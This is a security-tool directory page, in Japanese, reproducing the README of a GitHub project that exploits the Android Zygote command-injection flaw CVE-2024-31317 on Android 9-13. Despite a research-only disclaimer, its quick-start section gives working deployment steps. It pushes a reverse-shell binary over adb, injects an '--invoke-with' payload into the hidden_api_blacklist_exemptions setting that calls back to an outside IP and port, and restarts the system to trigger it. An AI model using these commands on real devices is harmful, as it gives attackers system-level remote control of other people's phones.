Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 Android Zygoteコマンドインジェクション脆弱性の研究・展開ツール | Android 9-13 エクスプロイトフレームワーク | Kitploit
ツール/GitHubGitHub/fcy10012/cve-2024-31317-deployer
Androidセキュリティ脆弱性分析エクスプロイトコマンド&コントロール学習と教育ペイロード開発バイナリエクスプロイト
GitHubfcy10012/cve-2024-31317-deployer

CVE-2024-31317-Deployer

CVE-2024-31317 Android Zygoteコマンドインジェクション脆弱性の研究・展開ツール | Android 9-13 エクスプロイトフレームワーク

リポジトリを見る
628ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-31317 Deployer

License Android Status

🔒 セキュリティ研究に関する声明

本プロジェクトはセキュリティ研究および教育目的のみに使用されます。本ツールを使用した無断のテストは違法です。作者はいかなる悪用や損害に対しても責任を負いません。

📋 概要

CVE-2024-31317 は、Android 9 から Android 13 のデバイスに影響する深刻なセキュリティ脆弱性であり、WRITE_SECURE_SETTINGS 権限を持つアプリケーションがコマンドインジェクションによってシステムレベルの権限で実行できるようになります。

本プロジェクトは、この脆弱性の詳細な技術分析、概念実証コード、および自動化されたデプロイツールを提供します。

✨ 主な特徴

  • 📱 Android 9-13 の全バージョンをサポート
  • 🛠️ 自動デプロイスクリプト
  • 🔄 リバースシェル接続
  • 📊 詳細な技術ドキュメント
  • 🎯 モジュール化された設計

🐛 脆弱性の詳細

  • CVE ID: CVE-2024-31317
  • 脆弱性タイプ: コマンドインジェクション
  • 深刻度: 高 (High)
  • CVSS スコア: 7.8
  • 影響を受けるコンポーネント: Android Zygote プロセス
  • 修正状況: 2024年6月の Android セキュリティパッチで修正済み

🎯 影響範囲

影響を受けるバージョン

  • ✅ Android 9-13

影響を受けないバージョン

  • ❌ Android 14+ (修正済み)
  • ❌ 2024年6月以降のセキュリティパッチがインストールされているデバイス

📁 プロジェクト構造

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 クイックスタート

1. プロジェクトのクローン

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Payload のコンパイル

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. デプロイ

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 ドキュメント

  • 詳細な技術分析
  • Payload の使用説明
  • 完全な使用チュートリアル

⚠️ 免責事項

本プロジェクトはセキュリティ研究および教育目的のみで使用されます。本ツールを使用することにより、以下に同意したものとみなされます:

  • 適用されるすべての法律および規制を遵守すること
  • 合法的なセキュリティ研究にのみ使用すること
  • ご自身の行動に対して全責任を負うこと

📜 ライセンス

本プロジェクトは MIT ライセンスを採用しています - 詳細は LICENSE ファイルを参照してください

👨‍💻 著者

fcy10012 - GitHub

🙏 謝辞

参考プロジェクト: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ このプロジェクトが役に立った場合は、スターを付けてください!

ツールをダウンロード